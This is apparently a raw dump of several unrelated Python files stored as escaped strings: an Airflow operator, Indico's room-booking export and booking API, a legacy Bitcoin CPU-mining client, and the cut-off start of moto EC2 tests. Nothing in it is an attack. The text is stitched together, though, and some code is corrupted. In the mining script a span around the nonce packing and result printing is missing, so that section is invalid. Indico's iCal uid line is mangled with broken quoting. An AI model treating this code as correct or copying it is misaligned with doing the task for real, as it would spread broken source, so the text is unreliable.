moduleauthor:: Miriam Sexton dummy@email.com\n""""""\n\nfrom airflow.operators import PythonOperator\n\nfrom .dive_operator import DiveOperator\n\n\nclass DivePythonOperator(DiveOperator, PythonOperator):\n """"""\n Python operator that can send along data dependencies to its callable.\n Generates the callable by initializing its python object and calling its method.\n """"""\n\n def __init__(self, python_object, python_method=""run"", *args, **kwargs):\n self.python_object = python_object\n self.python_method = python_method\n kwargs[\'python_callable\'] = None\n\n super(DivePythonOperator, self).__init__(*args, **kwargs)\n\n def pre_execute(self, context):\n context.update(self.op_kwargs)\n context.update({""data_dependencies"": self.data_dependencies})\n instantiated_object = self.python_object(context)\n self.python_callable = getattr(instantiated_object, self.python_method)\n', '# -*- coding: utf-8 -*-\n##\n##\n## This file is part of Indico\n## Copyright (C) 2002 - 2013 European Organization for Nuclear Research (CERN)\n##\n## Indico is free software: you can redistribute it and/or\n## modify it under the terms of the GNU General Public License as\n## published by the Free Software Foundation, either version 3 of the\n## License, or (at your option) any later version.\n##\n## Indico is distributed in the hope that it will be useful, but\n## WITHOUT ANY WARRANTY; without even the implied warranty of\n## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n## GNU General Public License for more details.\n##\n## You should have received a copy of the GNU General Public License\n## along with Indico. If not, see .\n\nfrom datetime import datetime\n\nimport icalendar\nimport pytz\nfrom babel.dates import get_timezone\nfrom sqlalchemy import Time, Date\nfrom sqlalchemy.sql import cast\nfrom werkzeug.datastructures import OrderedMultiDict, MultiDict\n\nfrom indico.core.config import Config\nfrom indico.core.db import db\nfrom indico.core.errors import IndicoError\nfrom indico.modules.rb.utils import rb_check_user_access\nfrom indico.modules.rb.models.reservations import Reservation, RepeatMapping, RepeatFrequency, ConflictingOccurrences\nfrom indico.modules.rb.models.locations import Location\nfrom indico.modules.rb.models.rooms import Room\nfrom indico.util.date_time import utc_to_server\nfrom indico.web.http_api import HTTPAPIHook\nfrom indico.web.http_api.metadata import ical\nfrom indico.web.http_api.responses import HTTPAPIError\nfrom indico.web.http_api.util import get_query_parameter\nfrom MaKaC.authentication import AuthenticatorMgr\nfrom MaKaC.common.info import HelperMaKaCInfo\n\n\nclass RoomBookingHookBase(HTTPAPIHook):\n GUEST_ALLOWED = False\n\n def _getParams(self):\n super(RoomBookingHookBase, self)._getParams()\n self._fromDT = utc_to_server(self._fromDT.astimezone(pytz.utc)).replace(tzinfo=None) if self._fromDT else None\n self._toDT = utc_to_server(self._toDT.astimezone(pytz.utc)).replace(tzinfo=None) if self._toDT else None\n self._occurrences = _yesno(get_query_parameter(self._queryParams, [\'occ\', \'occurrences\'], \'no\'))\n\n def _hasAccess(self, aw):\n return Config.getInstance().getIsRoomBookingActive() and rb_check_user_access(aw.getUser())\n\n\n@HTTPAPIHook.register\nclass RoomHook(RoomBookingHookBase):\n # e.g. 
/export/room/CERN/23.json\n TYPES = (\'room\',)\n RE = r\'(?P[\\w\\s]+)/(?P\\w+(?:-[\\w\\s]+)*)\'\n DEFAULT_DETAIL = \'rooms\'\n MAX_RECORDS = {\n \'rooms\': 500,\n \'reservations\': 100\n }\n VALID_FORMATS = (\'json\', \'jsonp\', \'xml\')\n\n def _getParams(self):\n super(RoomHook, self)._getParams()\n self._location = self._pathParams[\'location\']\n self._ids = map(int, self._pathParams[\'idlist\'].split(\'-\'))\n if self._detail not in {\'rooms\', \'reservations\'}:\n raise HTTPAPIError(\'Invalid detail level: %s\' % self._detail, 400)\n\n def export_room(self, aw):\n loc = Location.find_first(name=self._location)\n if loc is None:\n return\n\n # Retrieve rooms\n rooms_data = list(Room.get_with_data(\'vc_equipment\', \'non_vc_equipment\',\n filters=[Room.id.in_(self._ids), Room.location_id == loc.id]))\n\n # Retrieve reservations\n reservations = None\n if self._detail == \'reservations\':\n reservations = OrderedMultiDict(_export_reservations(self, True, False, [\n Reservation.room_id.in_(x[\'room\'].id for x in rooms_data)\n ]))\n\n for result in rooms_data:\n yield _serializable_room(result, reservations)\n\n\n@HTTPAPIHook.register\nclass RoomNameHook(RoomBookingHookBase):\n # e.g. /export/roomName/CERN/pump.json\n GUEST_ALLOWED = True\n TYPES = (\'roomName\', )\n RE = r\'(?P[\\w\\s]+)/(?P[\\w\\s\\-]+)\'\n DEFAULT_DETAIL = \'rooms\'\n MAX_RECORDS = {\n \'rooms\': 500\n }\n VALID_FORMATS = (\'json\', \'jsonp\', \'xml\')\n\n def _getParams(self):\n super(RoomNameHook, self)._getParams()\n self._location = self._pathParams[\'location\']\n self._room_name = self._pathParams[\'room_name\']\n\n def _hasAccess(self, aw):\n # Access to RB data (no reservations) is public\n return Config.getInstance().getIsRoomBookingActive()\n\n def export_roomName(self, aw):\n loc = Location.find_first(name=self._location)\n if loc is None:\n return\n\n search_str = \'%{}%\'.format(self._room_name)\n rooms_data = Room.get_with_data(\'vc_equipment\', \'non_vc_equipment\',\n filters=[Room.location_id == loc.id, Room.name.ilike(search_str)])\n for result in rooms_data:\n yield _serializable_room(result)\n\n\n@HTTPAPIHook.register\nclass ReservationHook(RoomBookingHookBase):\n # e.g. 
/export/reservation/CERN.json\n TYPES = (\'reservation\', )\n RE = r\'(?P[\\w\\s]+(?:-[\\w\\s]+)*)\'\n DEFAULT_DETAIL = \'reservations\'\n MAX_RECORDS = {\n \'reservations\': 100\n }\n VALID_FORMATS = (\'json\', \'jsonp\', \'xml\', \'ics\')\n\n @property\n def serializer_args(self):\n return {\'ical_serializer\': _ical_serialize_reservation}\n\n def _getParams(self):\n super(ReservationHook, self)._getParams()\n self._locations = self._pathParams[\'loclist\'].split(\'-\')\n\n def export_reservation(self, aw):\n locations = Location.find_all(Location.name.in_(self._locations))\n if not locations:\n return\n\n for room_id, reservation in _export_reservations(self, False, True):\n yield reservation\n\n\n@HTTPAPIHook.register\nclass BookRoomHook(HTTPAPIHook):\n PREFIX = \'api\'\n TYPES = (\'roomBooking\',)\n RE = r\'bookRoom\'\n GUEST_ALLOWED = False\n VALID_FORMATS = (\'json\', \'xml\')\n COMMIT = True\n HTTP_POST = True\n\n def _getParams(self):\n super(BookRoomHook, self)._getParams()\n self._fromDT = utc_to_server(self._fromDT.astimezone(pytz.utc)).replace(tzinfo=None) if self._fromDT else None\n self._toDT = utc_to_server(self._toDT.astimezone(pytz.utc)).replace(tzinfo=None) if self._toDT else None\n if not self._fromDT or not self._toDT or self._fromDT.date() != self._toDT.date():\n raise HTTPAPIError(\'from/to must be on the same day\')\n elif self._fromDT >= self._toDT:\n raise HTTPAPIError(\'to must be after from\')\n elif self._fromDT < datetime.now():\n raise HTTPAPIError(\'You cannot make bookings in the past\')\n\n username = get_query_parameter(self._queryParams, \'username\')\n avatars = username and filter(None, AuthenticatorMgr().getAvatarByLogin(username).itervalues())\n if not avatars:\n raise HTTPAPIError(\'Username does not exist\')\n elif len(avatars) != 1:\n raise HTTPAPIError(\'Ambiguous username ({} users found)\'.format(len(avatars)))\n avatar = avatars[0]\n\n self._params = {\n \'room_id\': get_query_parameter(self._queryParams, \'roomid\'),\n \'reason\': get_query_parameter(self._queryParams, \'reason\'),\n \'booked_for\': avatar,\n \'from\': self._fromDT,\n \'to\': self._toDT\n }\n missing = [key for key, val in self._params.iteritems() if not val]\n if missing:\n raise HTTPAPIError(\'Required params missing: {}\'.format(\', \'.join(missing)))\n self._room = Room.get(self._params[\'room_id\'])\n if not self._room:\n raise HTTPAPIError(\'A room with this ID does not exist\')\n\n def _hasAccess(self, aw):\n if not Config.getInstance().getIsRoomBookingActive() or not rb_check_user_access(aw.getUser()):\n return False\n if self._room.can_be_booked(aw.getUser()):\n return True\n elif self._room.can_be_prebooked(aw.getUser()):\n raise HTTPAPIError(\'The API only supports direct bookings but this room only allows pre-bookings.\')\n return False\n\n def api_roomBooking(self, aw):\n data = MultiDict({\n \'start_dt\': self._params[\'from\'],\n \'end_dt\': self._params[\'to\'],\n \'repeat_frequency\': RepeatFrequency.NEVER,\n \'repeat_interval\': 0,\n \'room_id\': self._room.id,\n \'booked_for_id\': self._params[\'booked_for\'].getId(),\n \'contact_email\': self._params[\'booked_for\'].getEmail(),\n \'contact_phone\': self._params[\'booked_for\'].getTelephone(),\n \'booking_reason\': self._params[\'reason\']\n })\n try:\n reservation = Reservation.create_from_data(self._room, data, aw.getUser())\n except ConflictingOccurrences:\n raise HTTPAPIError(\'Failed to create the booking due to conflicts with other bookings\')\n except IndicoError as e:\n raise HTTPAPIError(\'Failed 
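BookRoomHook._getParams enforces three rules on the requested interval before anything else is validated. Restated as plain assertions with hypothetical datetimes (a minimal sketch, not part of the module):

from datetime import datetime, timedelta

from_dt = datetime.now() + timedelta(hours=1)
to_dt = from_dt + timedelta(hours=2)

assert from_dt.date() == to_dt.date()   # from/to must be on the same day
assert from_dt < to_dt                  # 'to' must be after 'from'
assert from_dt >= datetime.now()        # no bookings in the past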
to create the booking: {}\'.format(e))\n db.session.add(reservation)\n db.session.flush()\n return {\'reservationID\': reservation.id}\n\n\ndef _export_reservations(hook, limit_per_room, include_rooms, extra_filters=None):\n """"""Exports reservations.\n\n :param hook: The HTTPAPIHook instance\n :param limit_per_room: Should the limit/offset be applied per room\n :param include_rooms: Should reservations include room information\n """"""\n filters = list(extra_filters) if extra_filters else []\n if hook._fromDT and hook._toDT:\n filters.append(cast(Reservation.start_dt, Date) <= hook._toDT.date())\n filters.append(cast(Reservation.end_dt, Date) >= hook._fromDT.date())\n filters.append(cast(Reservation.start_dt, Time) <= hook._toDT.time())\n filters.append(cast(Reservation.end_dt, Time) >= hook._fromDT.time())\n elif hook._toDT:\n filters.append(cast(Reservation.end_dt, Date) <= hook._toDT.date())\n filters.append(cast(Reservation.end_dt, Time) <= hook._toDT.time())\n elif hook._fromDT:\n filters.append(cast(Reservation.start_dt, Date) >= hook._fromDT.date())\n filters.append(cast(Reservation.start_dt, Time) >= hook._fromDT.time())\n filters += _get_reservation_state_filter(hook._queryParams)\n occurs = [datetime.strptime(x, \'%Y-%m-%d\').date()\n for x in filter(None, get_query_parameter(hook._queryParams, [\'occurs\'], \'\').split(\',\'))]\n data = [\'vc_equipment\']\n if hook._occurrences:\n data.append(\'occurrences\')\n order = {\n \'start\': Reservation.start_dt,\n \'end\': Reservation.end_dt\n }.get(hook._orderBy, Reservation.start_dt)\n if hook._descending:\n order = order.desc()\n reservations_data = Reservation.get_with_data(*data, filters=filters, limit=hook._limit, offset=hook._offset,\n order=order, limit_per_room=limit_per_room, occurs_on=occurs)\n for result in reservations_data:\n yield result[\'reservation\'].room_id, _serializable_reservation(result, include_rooms)\n\n\ndef _serializable_room(room_data, reservations=None):\n """"""Serializable room data\n\n :param room_data: Room data\n :param reservations: MultiDict mapping for room id => reservations\n """"""\n data = room_data[\'room\'].to_serializable(\'__api_public__\')\n data[\'_type\'] = \'Room\'\n data[\'avc\'] = bool(room_data[\'vc_equipment\'])\n data[\'vcList\'] = room_data[\'vc_equipment\']\n data[\'equipment\'] = room_data[\'non_vc_equipment\']\n if reservations is not None:\n data[\'reservations\'] = reservations.getlist(room_data[\'room\'].id)\n return data\n\n\ndef _serializable_room_minimal(room):\n """"""Serializable minimal room data (inside reservations)\n\n :param room: A `Room`\n """"""\n data = room.to_serializable(\'__api_minimal_public__\')\n data[\'_type\'] = \'Room\'\n return data\n\n\ndef _serializable_reservation(reservation_data, include_room=False):\n """"""Serializable reservation (standalone or inside room)\n\n :param reservation_data: Reservation data\n :param include_room: Include minimal room information\n """"""\n reservation = reservation_data[\'reservation\']\n data = reservation.to_serializable(\'__api_public__\', converters={datetime: _add_server_tz})\n data[\'_type\'] = \'Reservation\'\n data[\'repeatability\'] = None\n if reservation.repeat_frequency:\n data[\'repeatability\'] = RepeatMapping.get_short_name(*reservation.repetition)\n data[\'vcList\'] = reservation_data[\'vc_equipment\']\n if include_room:\n data[\'room\'] = _serializable_room_minimal(reservation_data[\'reservation\'].room)\n if \'occurrences\' in reservation_data:\n data[\'occurrences\'] = 
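When both bounds are supplied, _export_reservations above filters the date and time components independently (via SQL casts to Date and Time). A plain-Python restatement of that window test with made-up values, just to show which reservations pass:

from datetime import datetime

res_start, res_end = datetime(2014, 6, 2, 9, 0), datetime(2014, 6, 2, 17, 0)
q_from, q_to = datetime(2014, 6, 1, 8, 0), datetime(2014, 6, 30, 18, 0)

matches = (res_start.date() <= q_to.date() and res_end.date() >= q_from.date() and
           res_start.time() <= q_to.time() and res_end.time() >= q_from.time())
assert matches  # both the date window and the time-of-day window overlap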
[o.to_serializable(\'__api_public__\', converters={datetime: _add_server_tz})\n for o in reservation_data[\'occurrences\']]\n return data\n\n\ndef _ical_serialize_repeatability(data):\n start_dt_utc = data[\'startDT\'].astimezone(pytz.utc)\n end_dt_utc = data[\'endDT\'].astimezone(pytz.utc)\n WEEK_DAYS = \'MO TU WE TH FR SA SU\'.split()\n recur = ical.vRecur()\n recur[\'until\'] = end_dt_utc\n if data[\'repeat_frequency\'] == RepeatFrequency.DAY:\n recur[\'freq\'] = \'daily\'\n elif data[\'repeat_frequency\'] == RepeatFrequency.WEEK:\n recur[\'freq\'] = \'weekly\'\n recur[\'interval\'] = data[\'repeat_interval\']\n elif data[\'repeat_frequency\'] == RepeatFrequency.MONTH:\n recur[\'freq\'] = \'monthly\'\n recur[\'byday\'] = \'{}{}\'.format(start_dt_utc.day // 7, WEEK_DAYS[start_dt_utc.weekday()])\n return recur\n\n\ndef _ical_serialize_reservation(cal, data, now):\n start_dt_utc = data[\'startDT\'].astimezone(pytz.utc)\n end_dt_utc = datetime.combine(data[\'startDT\'].date(), data[\'endDT\'].timetz()).astimezone(pytz.utc)\n\n event = icalendar.Event()\n event.add(\'uid\', dummy@email.com\' % data[\'id\'])\n event.add(\'dtstamp\', now)\n event.add(\'dtstart\', start_dt_utc)\n event.add(\'dtend\', end_dt_utc)\n event.add(\'url\', data[\'bookingUrl\'])\n event.add(\'summary\', data[\'reason\'])\n event.add(\'location\', u\'{}: {}\'.format(data[\'location\'], data[\'room\'][\'fullName\']))\n event.add(\'description\', data[\'reason\'].decode(\'utf-8\') + \'\\n\\n\' + data[\'bookingUrl\'])\n if data[\'repeat_frequency\'] != RepeatFrequency.NEVER:\n event.add(\'rrule\', _ical_serialize_repeatability(data))\n cal.add_component(event)\n\n\ndef _add_server_tz(dt):\n if dt.tzinfo is None:\n return dt.replace(tzinfo=get_timezone(HelperMaKaCInfo.getMaKaCInfoInstance().getTimezone()))\n return dt\n\n\ndef _yesno(value):\n return value.lower() in {\'yes\', \'y\', \'1\', \'true\'}\n\n\ndef _get_reservation_state_filter(params):\n cancelled = get_query_parameter(params, [\'cxl\', \'cancelled\'])\n rejected = get_query_parameter(params, [\'rej\', \'rejected\'])\n confirmed = get_query_parameter(params, [\'confirmed\'])\n archived = get_query_parameter(params, [\'arch\', \'archived\', \'archival\'])\n repeating = get_query_parameter(params, [\'rec\', \'recurring\', \'rep\', \'repeating\'])\n avc = get_query_parameter(params, [\'avc\'])\n avc_support = get_query_parameter(params, [\'avcs\', \'avcsupport\'])\n startup_support = get_query_parameter(params, [\'sts\', \'startupsupport\'])\n booked_for = get_query_parameter(params, [\'bf\', \'bookedfor\'])\n\n filters = []\n if cancelled is not None:\n filters.append(Reservation.is_cancelled == _yesno(cancelled))\n if rejected is not None:\n filters.append(Reservation.is_rejected == _yesno(rejected))\n if confirmed is not None:\n if confirmed == \'pending\':\n filters.append(Reservation.is_pending)\n elif _yesno(confirmed):\n filters.append(Reservation.is_accepted)\n else:\n filters.append(~Reservation.is_accepted)\n filters.append(Reservation.is_rejected | Reservation.is_cancelled)\n if archived is not None:\n filters.append(Reservation.is_archived == _yesno(archived))\n if repeating is not None:\n if _yesno(repeating):\n filters.append(Reservation.repeat_frequency != 0)\n else:\n filters.append(Reservation.repeat_frequency == 0)\n if avc is not None:\n filters.append(Reservation.uses_vc == _yesno(avc))\n if avc_support is not None:\n filters.append(Reservation.needs_vc_assistance == _yesno(avc_support))\n if startup_support is not None:\n 
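The monthly branch of _ical_serialize_repeatability above encodes "nth weekday of the month" as an iCalendar BYDAY value. A standalone sketch of the same formula (the sample date is illustrative; this mirrors the code's `day // 7` arithmetic as written):

from datetime import datetime

WEEK_DAYS = 'MO TU WE TH FR SA SU'.split()
start = datetime(2014, 6, 15)   # a Sunday
byday = '{}{}'.format(start.day // 7, WEEK_DAYS[start.weekday()])
assert byday == '2SU'           # 15 // 7 == 2, weekday() == 6 -> 'SU'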
filters.append(Reservation.needs_assistance == _yesno(startup_support))\n if booked_for:\n like_str = \'%{}%\'.format(booked_for.replace(\'?\', \'_\').replace(\'*\', \'%\'))\n filters.append(Reservation.booked_for_name.ilike(like_str))\n return filters\n', '#!/usr/bin/python\n#\n# Copyright (c) 2011 The Bitcoin developers\n# Distributed under the MIT/X11 software license, see the accompanying\n# file COPYING or http://www.opensource.org/licenses/mit-license.php.\n#\n\nimport time\nimport json\nimport pprint\nimport hashlib\nimport struct\nimport re\nimport base64\nimport httplib\nimport sys\nfrom multiprocessing import Process\n\nERR_SLEEP = 15\nMAX_NONCE = 1000000L\n\nsettings = {}\npp = pprint.PrettyPrinter(indent=4)\n\nclass BitcoinRPC:\n\tOBJID = 1\n\n\tdef __init__(self, host, port, username, password):\n\t\tauthpair = ""%s:%s"" % (username, password)\n\t\tself.authhdr = ""Basic %s"" % (base64.b64encode(authpair))\n\t\tself.conn = httplib.HTTPConnection(host, port, False, 30)\n\tdef rpc(self, method, params=None):\n\t\tself.OBJID += 1\n\t\tobj = { \'version\' : \'1.1\',\n\t\t\t\'method\' : method,\n\t\t\t\'id\' : self.OBJID }\n\t\tif params is None:\n\t\t\tobj[\'params\'] = []\n\t\telse:\n\t\t\tobj[\'params\'] = params\n\t\tself.conn.request(\'POST\', \'/\', json.dumps(obj),\n\t\t\t{ \'Authorization\' : self.authhdr,\n\t\t\t \'Content-type\' : \'application/json\' })\n\n\t\tresp = self.conn.getresponse()\n\t\tif resp is None:\n\t\t\tprint ""JSON-RPC: no response""\n\t\t\treturn None\n\n\t\tbody = resp.read()\n\t\tresp_obj = json.loads(body)\n\t\tif resp_obj is None:\n\t\t\tprint ""JSON-RPC: cannot JSON-decode body""\n\t\t\treturn None\n\t\tif \'error\' in resp_obj and resp_obj[\'error\'] != None:\n\t\t\treturn resp_obj[\'error\']\n\t\tif \'result\' not in resp_obj:\n\t\t\tprint ""JSON-RPC: no result in object""\n\t\t\treturn None\n\n\t\treturn resp_obj[\'result\']\n\tdef getblockcount(self):\n\t\treturn self.rpc(\'getblockcount\')\n\tdef getwork(self, data=None):\n\t\treturn self.rpc(\'getwork\', data)\n\ndef uint32(x):\n\treturn x & 0xffffffffL\n\ndef bytereverse(x):\n\treturn uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |\n\t\t\t(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))\n\ndef bufreverse(in_buf):\n\tout_words = []\n\tfor i in range(0, len(in_buf), 4):\n\t\tword = struct.unpack(\'@I\', in_buf[i:i+4])[0]\n\t\tout_words.append(struct.pack(\'@I\', bytereverse(word)))\n\treturn \'\'.join(out_words)\n\ndef wordreverse(in_buf):\n\tout_words = []\n\tfor i in range(0, len(in_buf), 4):\n\t\tout_words.append(in_buf[i:i+4])\n\tout_words.reverse()\n\treturn \'\'.join(out_words)\n\nclass Miner:\n\tdef __init__(self, id):\n\t\tself.id = id\n\t\tself.max_nonce = MAX_NONCE\n\n\tdef work(self, datastr, targetstr):\n\t\t# decode work data hex string to binary\n\t\tstatic_data = datastr.decode(\'hex\')\n\t\tstatic_data = bufreverse(static_data)\n\n\t\t# the first 76b of 80b do not change\n\t\tblk_hdr = static_data[:76]\n\n\t\t# decode 256-bit target value\n\t\ttargetbin = targetstr.decode(\'hex\')\n\t\ttargetbin = targetbin[::-1]\t# byte-swap and dword-swap\n\t\ttargetbin_str = targetbin.encode(\'hex\')\n\t\ttarget = long(targetbin_str, 16)\n\n\t\t# pre-hash first 76b of block header\n\t\tstatic_hash = hashlib.sha256()\n\t\tstatic_hash.update(blk_hdr)\n\n\t\tfor nonce in xrange(self.max_nonce):\n\n\t\t\t# encode 32-bit nonce value\n\t\t\tnonce_bin = struct.pack("" Upstream RPC result:"", result\n\n\tdef iterate(self, rpc):\n\t\twork = rpc.getwork()\n\t\tif work is 
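A minimal usage sketch for the BitcoinRPC wrapper above. The host, port, and credentials are placeholders, and the calls assume a reachable bitcoind-style JSON-RPC server; getwork() returns a dict whose hex 'data' and 'target' fields are what Miner.iterate checks for:

rpc = BitcoinRPC('127.0.0.1', 9131, 'rpcuser', 'rpcpass')
print(rpc.getblockcount())   # plain RPC call with no params
work = rpc.getwork()         # dict with hex-encoded 'data' and 'target'
print(work['target'])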
None:\n\t\t\ttime.sleep(ERR_SLEEP)\n\t\t\treturn\n\t\tif \'data\' not in work or \'target\' not in work:\n\t\t\ttime.sleep(ERR_SLEEP)\n\t\t\treturn\n\n\t\ttime_start = time.time()\n\n\t\t(hashes_done, nonce_bin) = self.work(work[\'data\'],\n\t\t\t\t\t\t work[\'target\'])\n\n\t\ttime_end = time.time()\n\t\ttime_diff = time_end - time_start\n\n\t\tself.max_nonce = long(\n\t\t\t(hashes_done * settings[\'scantime\']) / time_diff)\n\t\tif self.max_nonce > 0xfffffffaL:\n\t\t\tself.max_nonce = 0xfffffffaL\n\n\t\tif settings[\'hashmeter\']:\n\t\t\tprint ""HashMeter(%d): %d hashes, %.2f Khash/sec"" % (\n\t\t\t self.id, hashes_done,\n\t\t\t (hashes_done / 1000.0) / time_diff)\n\n\t\tif nonce_bin is not None:\n\t\t\tself.submit_work(rpc, work[\'data\'], nonce_bin)\n\n\tdef loop(self):\n\t\trpc = BitcoinRPC(settings[\'host\'], settings[\'port\'],\n\t\t\t\t settings[\'rpcuser\'], settings[\'rpcpass\'])\n\t\tif rpc is None:\n\t\t\treturn\n\n\t\twhile True:\n\t\t\tself.iterate(rpc)\n\ndef miner_thread(id):\n\tminer = Miner(id)\n\tminer.loop()\n\nif __name__ == \'__main__\':\n\tif len(sys.argv) != 2:\n\t\tprint ""Usage: pyminer.py CONFIG-FILE""\n\t\tsys.exit(1)\n\n\tf = open(sys.argv[1])\n\tfor line in f:\n\t\t# skip comment lines\n\t\tm = re.search(\'^\\s*#\', line)\n\t\tif m:\n\t\t\tcontinue\n\n\t\t# parse key=value lines\n\t\tm = re.search(\'^(\\w+)\\s*=\\s*(\\S.*)$\', line)\n\t\tif m is None:\n\t\t\tcontinue\n\t\tsettings[m.group(1)] = m.group(2)\n\tf.close()\n\n\tif \'host\' not in settings:\n\t\tsettings[\'host\'] = \'127.0.0.1\'\n\tif \'port\' not in settings:\n\t\tsettings[\'port\'] = 9131\n\tif \'threads\' not in settings:\n\t\tsettings[\'threads\'] = 1\n\tif \'hashmeter\' not in settings:\n\t\tsettings[\'hashmeter\'] = 0\n\tif \'scantime\' not in settings:\n\t\tsettings[\'scantime\'] = 30L\n\tif \'rpcuser\' not in settings or \'rpcpass\' not in settings:\n\t\tprint ""Missing username and/or password in cfg file""\n\t\tsys.exit(1)\n\n\tsettings[\'port\'] = int(settings[\'port\'])\n\tsettings[\'threads\'] = int(settings[\'threads\'])\n\tsettings[\'hashmeter\'] = int(settings[\'hashmeter\'])\n\tsettings[\'scantime\'] = long(settings[\'scantime\'])\n\n\tthr_list = []\n\tfor thr_id in range(settings[\'threads\']):\n\t\tp = Process(target=miner_thread, args=(thr_id,))\n\t\tp.start()\n\t\tthr_list.append(p)\n\t\ttime.sleep(1)\t\t\t# stagger threads\n\n\tprint settings[\'threads\'], ""mining threads started""\n\n\tprint time.asctime(), ""Miner Starts - %s:%s"" % (settings[\'host\'], settings[\'port\'])\n\ttry:\n\t\tfor thr_proc in thr_list:\n\t\t\tthr_proc.join()\n\texcept KeyboardInterrupt:\n\t\tpass\n\tprint time.asctime(), ""Miner Stops - %s:%s"" % (settings[\'host\'], settings[\'port\'])\n\n', 'from __future__ import unicode_literals\n\nfrom botocore.exceptions import ClientError\n\nimport pytest\nfrom unittest import SkipTest\n\nimport base64\nimport ipaddress\n\nimport six\nimport boto\nimport boto3\nfrom boto.ec2.instance import Reservation, InstanceAttribute\nfrom boto.exception import EC2ResponseError\nfrom freezegun import freeze_time\nimport sure # noqa\n\nfrom moto import mock_ec2_deprecated, mock_ec2, settings\nfrom tests import EXAMPLE_AMI_ID\nfrom tests.helpers import requires_boto_gte\n\n\nif six.PY2:\n decode_method = base64.decodestring\nelse:\n decode_method = base64.decodebytes\n\n################ Test Readme ###############\ndef add_servers(ami_id, count):\n conn = boto.connect_ec2()\n for index in range(count):\n conn.run_instances(ami_id)\n\n\n@mock_ec2_deprecated\ndef 
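The __main__ block above parses a flat key=value CONFIG-FILE, skipping comment lines. A self-contained demo of that same regex logic on a few illustrative lines (the file names and values are placeholders; omitted keys fall back to the defaults set in __main__):

import re

settings = {}
for line in ["# a comment", "host=127.0.0.1", "threads = 2"]:
    # skip comment lines, exactly as the loop above does
    if re.search(r'^\s*#', line):
        continue
    # parse key=value lines, tolerating whitespace around '='
    m = re.search(r'^(\w+)\s*=\s*(\S.*)$', line)
    if m:
        settings[m.group(1)] = m.group(2)
assert settings == {'host': '127.0.0.1', 'threads': '2'}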
test_add_servers():\n add_servers(EXAMPLE_AMI_ID, 2)\n\n conn = boto.connect_ec2()\n reservations = conn.get_all_reservations()\n assert len(reservations) == 2\n instance1 = reservations[0].instances[0]\n assert instance1.image_id == EXAMPLE_AMI_ID\n\n\n############################################\n\n\n@freeze_time(""2014-01-01 05:00:00"")\n@mock_ec2_deprecated\ndef test_instance_launch_and_terminate():\n conn = boto.ec2.connect_to_region(""us-east-1"")\n\n with pytest.raises(EC2ResponseError) as ex:\n reservation = conn.run_instances(EXAMPLE_AMI_ID, dry_run=True)\n ex.value.error_code.should.equal(""DryRunOperation"")\n ex.value.status.should.equal(400)\n ex.value.message.should.equal(\n ""An error occurred (DryRunOperation) when calling the RunInstance operation: Request would have succeeded, but DryRun flag is set""\n )\n\n reservation = conn.run_instances(EXAMPLE_AMI_ID)\n reservation.should.be.a(Reservation)\n reservation.instances.should.have.length_of(1)\n instance = reservation.instances[0]\n instance.state.should.equal(""pending"")\n\n reservations = conn.get_all_reservations()\n reservations.should.have.length_of(1)\n reservations[0].id.should.equal(reservation.id)\n instances = reservations[0].instances\n instances.should.have.length_of(1)\n instance = instances[0]\n instance.id.should.equal(instance.id)\n instance.state.should.equal(""running"")\n instance.launch_time.should.equal(""2014-01-01T05:00:00.000Z"")\n instance.vpc_id.shouldnt.equal(None)\n instance.placement.should.equal(""us-east-1a"")\n\n root_device_name = instance.root_device_name\n instance.block_device_mapping[root_device_name].status.should.equal(""in-use"")\n volume_id = instance.block_device_mapping[root_device_name].volume_id\n volume_id.should.match(r""vol-\\w+"")\n\n volume = conn.get_all_volumes(volume_ids=[volume_id])[0]\n volume.attach_data.instance_id.should.equal(instance.id)\n volume.status.should.equal(""in-use"")\n\n with pytest.raises(EC2ResponseError) as ex:\n conn.terminate_instances([instance.id], dry_run=True)\n ex.value.error_code.should.equal(""DryRunOperation"")\n ex.value.status.should.equal(400)\n ex.value.message.should.equal(\n ""An error occurred (DryRunOperation) when calling the TerminateInstance operation: Request would have succeeded, but DryRun flag is set""\n )\n\n conn.terminate_instances([instance.id])\n\n reservations = conn.get_all_reservations()\n instance = reservations[0].instances[0]\n instance.state.should.equal(""terminated"")\n\n\n@mock_ec2\ndef test_instance_terminate_discard_volumes():\n\n ec2_resource = boto3.resource(""ec2"", ""us-west-1"")\n\n result = ec2_resource.create_instances(\n ImageId=EXAMPLE_AMI_ID,\n MinCount=1,\n MaxCount=1,\n BlockDeviceMappings=[\n {\n ""DeviceName"": ""/dev/sda1"",\n ""Ebs"": {""VolumeSize"": 50, ""DeleteOnTermination"": True},\n }\n ],\n )\n instance = result[0]\n\n instance_volume_ids = []\n for volume in instance.volumes.all():\n instance_volume_ids.append(volume.volume_id)\n\n instance.terminate()\n instance.wait_until_terminated()\n\n assert not list(ec2_resource.volumes.all())\n\n\n@mock_ec2\ndef test_instance_terminate_keep_volumes_explicit():\n\n ec2_resource = boto3.resource(""ec2"", ""us-west-1"")\n\n result = ec2_resource.create_instances(\n ImageId=EXAMPLE_AMI_ID,\n MinCount=1,\n MaxCount=1,\n BlockDeviceMappings=[\n {\n ""DeviceName"": ""/dev/sda1"",\n ""Ebs"": {""VolumeSize"": 50, ""DeleteOnTermination"": False},\n }\n ],\n )\n instance = result[0]\n\n instance_volume_ids = []\n for volume in instance.volumes.all():\n 
instance_volume_ids.append(volume.volume_id)\n\n instance.terminate()\n instance.wait_until_terminated()\n\n assert len(list(ec2_resource.volumes.all())) == 1\n\n\n@mock_ec2\ndef test_instance_terminate_keep_volumes_implicit():\n ec2_resource = boto3.resource(""ec2"", ""us-west-1"")\n\n result = ec2_resource.create_instances(\n ImageId=EXAMPLE_AMI_ID,\n MinCount=1,\n MaxCount=1,\n BlockDeviceMappings=[{""DeviceName"": ""/dev/sda1"", ""Ebs"": {""VolumeSize"": 50}}],\n )\n instance = result[0]\n\n instance_volume_ids = []\n for volume in instance.volumes.all():\n instance_volume_ids.append(volume.volume_id)\n\n instance.terminate()\n instance.wait_until_terminated()\n\n assert len(instance_volume_ids) == 1\n volume = ec2_resource.Volume(instance_volume_ids[0])\n volume.state.should.equal(""available"")\n\n\n@mock_ec2\ndef test_instance_terminate_detach_volumes():\n ec2_resource = boto3.resource(""ec2"", ""us-west-1"")\n result = ec2_resource.create_instances(\n ImageId=EXAMPLE_AMI_ID,\n MinCount=1,\n MaxCount=1,\n BlockDeviceMappings=[\n {""DeviceName"": ""/dev/sda1"", ""Ebs"": {""VolumeSize"": 50}},\n {""DeviceName"": ""/dev/sda2"", ""Ebs"": {""VolumeSize"": 